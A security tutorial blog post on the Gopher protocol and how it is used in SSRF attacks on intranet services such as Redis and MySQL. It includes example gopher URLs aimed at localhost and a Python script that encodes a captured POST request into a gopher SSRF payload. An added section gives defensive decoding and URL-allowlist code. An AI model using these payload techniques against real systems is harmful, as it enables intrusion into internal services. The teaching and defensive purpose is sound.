[Network Security] Gopher Protocol Principles, Syntax and Utilization Summary

What is the gopher protocol

The Gopher protocol is an early Internet protocol for obtaining text information on the network. It was proposed in 1991 to provide a simple and efficient way to browse and access files.

The Gopher protocol organizes data using a file system-like hierarchy, where each item has a unique identifier. Through the Gopher client software, users can browse the catalog and choose to download or view files. Gopher servers can serve text files, image files, binary files, etc.

The Gopher protocol has a simpler design and fewer features than HTTP. It communicates based on the Transmission Control Protocol (TCP), and the default port number is 70. However, with the rise of the World Wide Web and the popularity of HTTP, the Gopher protocol was gradually replaced.


Usage

The gopher protocol matters for SSRF because a gopher-capable client writes the selector part of the URL to the target port verbatim, so one gopher URL can carry an arbitrary text-based request. That is why it can be used against Redis, MySQL, FastCGI, FTP and similar services on the intranet, and can also deliver GET and POST requests, which broadens the attack surface of an SSRF vulnerability.


Syntax

The format of the gopher protocol is usually:

gopher://hostname:port/request-method(GET, POST, etc.)/path

Here hostname is the host name or IP address of the Gopher server, port is the port the Gopher server listens on (70 by default), and path is the path of the resource.

For example:

  1. To request the text file /example/file.txt on a Gopher server, the following URL format can be used:
gopher://example.com:port/example/file.txt
  2. To use the GET method through the Gopher protocol to access a resource on port 80 of the local host:
gopher://127.0.0.1:80/_GET /index.php HTTP/1.1

/_GET /index.php HTTP/1.1 means the GET method is used to request the resource at /index.php with HTTP protocol version 1.1. The "_" after the slash is the one-character gopher item type; the client consumes it and sends everything after it to port 80 unchanged, which is why the remainder of the URL can be an HTTP request line.

  3. For POST requests, after capturing the packet you can use the following script to convert it into gopher protocol format:

import urllib.parse

# Request to be carried in the gopher URL. The page path is a placeholder,
# and the form field stands for the key/cookie value used for
# authentication or authorization.
body = "key=xxx"
payload = (
    "POST /target_page.php HTTP/1.1\n"
    "Host: 127.0.0.1\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    f"Content-Length: {len(body)}\n"
    "\n"
    f"{body}\n"
)

# Percent-encode the special characters in the payload
tmp = urllib.parse.quote(payload)

# Replace the newline %0A with CRLF %0D%0A, the line ending HTTP expects
new = tmp.replace('%0A', '%0D%0A')

# Build the Gopher URL; "_" is the gopher item type byte, which the client
# strips before writing the rest of the selector to the socket
result = 'gopher://127.0.0.1:80/' + '_' + new

# Encode the whole URL once more so it survives being passed as a parameter
# of another URL (the receiving application decodes it once)
result = urllib.parse.quote(result)

print(result)
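The two pieces a defender needs next to the syntax above and the encoding script are the reverse operation and the control: a decoder that turns a gopher URL found in a proxy or application log back into the exact bytes a gopher-capable client would write to the socket (including the doubly percent-encoded form the script produces), and the scheme/host check a server-side fetcher should apply before following a user-supplied URL. The following is an added example written for this page, not code from the original post; the function names, the SAMPLE_REQUEST value and the allowlist policy are this example's own assumptions.

```python
"""Added example (not from the original post): decode gopher:// URLs into the raw
bytes the client would send, and enforce a fetch allowlist. All sample values
are constructed for this example."""
import ipaddress
from urllib.parse import quote, unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def decode_gopher_url(url: str, max_rounds: int = 3):
    """Return (host, port, item_type, raw_bytes) for a gopher:// URL.

    Syntax is gopher://host:port/<type><selector>: the client consumes the
    one-character item type ("_" in the post's examples) and writes the selector
    to the socket verbatim, so the selector *is* the request. Percent-decoding
    is repeated (bounded) until the scheme is visible, which recovers URLs that
    were encoded twice for transport inside another URL's parameter."""
    rounds = 0
    while not url.lower().startswith("gopher://"):
        if rounds >= max_rounds or "%" not in url:
            raise ValueError("not a gopher URL")
        url = unquote(url)
        rounds += 1
    parts = urlsplit(url)
    if parts.hostname is None:
        raise ValueError("gopher URL without host")
    port = parts.port if parts.port is not None else 70  # gopher default port
    # The path is still percent-encoded once; latin-1 maps bytes 1:1 to chars
    selector = unquote(parts.path, encoding="latin-1")
    if not selector.startswith("/") or len(selector) < 2:
        raise ValueError("gopher URL without item type")
    item_type, payload = selector[1], selector[2:]
    return parts.hostname, port, item_type, payload.encode("latin-1")


def is_allowed_fetch_url(url: str) -> bool:
    """Server-side check applied to a user-supplied URL before fetching it.

    Refuses every scheme except http/https (so gopher://, file://, dict:// and
    their percent-encoded spellings are rejected) and literal loopback, private,
    link-local, reserved, multicast and unspecified hosts. For a DNS name the
    caller must resolve and re-check the address at connect time (rebinding),
    which is outside this example."""
    candidate = url
    for _ in range(3):  # look through up to three layers of percent-encoding
        parts = urlsplit(candidate)
        if parts.scheme or "%" not in candidate:
            break
        candidate = unquote(candidate)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # DNS name: resolve and re-check in the caller
    return not (addr.is_loopback or addr.is_private or addr.is_link_local
                or addr.is_reserved or addr.is_multicast or addr.is_unspecified)


# Constructed sample: the post's double-encoding recipe applied to a short
# request, i.e. what an SSRF parameter carrying a gopher URL looks like in a log
SAMPLE_REQUEST = "GET /admin HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
SAMPLE_DOUBLE_ENCODED = quote("gopher://127.0.0.1:80/_" + quote(SAMPLE_REQUEST))

if __name__ == "__main__":
    for u in ("gopher://127.0.0.1:80/_GET /index.php HTTP/1.1", SAMPLE_DOUBLE_ENCODED):
        host, port, typ, raw = decode_gopher_url(u)
        print(f"{host}:{port} type={typ!r} would send {raw!r}")
    for u in ("https://example.com/feed", SAMPLE_DOUBLE_ENCODED, "http://127.0.0.1/"):
        print(f"{'ALLOW' if is_allowed_fetch_url(u) else 'DENY'}\t{u[:60]}")
```

decode_gopher_url is the triage view: paste the value seen in a log and read off host, port and the literal bytes that would reach that port. is_allowed_fetch_url is the mitigation; it is written as a scheme allowlist rather than a gopher denylist because the same SSRF reaches dict://, file:// and friends, and it decodes before checking so that gopher%3A// is not waved through.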

Practice

Practical reference:

[CTF/Network Security] Very_easy_sql problem solving in the offensive and defensive world (gopher protocol + ssrf vulnerability sql injection + blind script)


Summary

That concludes this summary of the principles, syntax and utilization of the Gopher protocol; readers can practise it themselves.

I am Qiu said; see you next time.

Origin blog.csdn.net/2301_77485708/article/details/132052102